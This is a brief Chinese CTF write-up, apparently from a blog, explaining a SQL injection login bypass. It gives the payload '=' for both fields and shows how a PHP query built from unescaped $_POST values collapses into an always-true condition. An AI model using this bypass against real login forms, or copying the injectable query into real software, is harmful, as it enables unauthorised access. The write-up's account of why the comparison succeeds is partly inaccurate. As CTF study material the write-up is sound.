这个CTF题目的payload真的简单到淫荡,看一下就是这样的
admin-> ‘=’
password-> ‘=’
真是醉了,为什么呢,类似这样的语句
$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;
如果我们按照上面输入就成了
$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;
user=”返回的是NULL=”也是符合条件的,最后就是
$sql = “select user from flag where 1 and 1”;
网友评论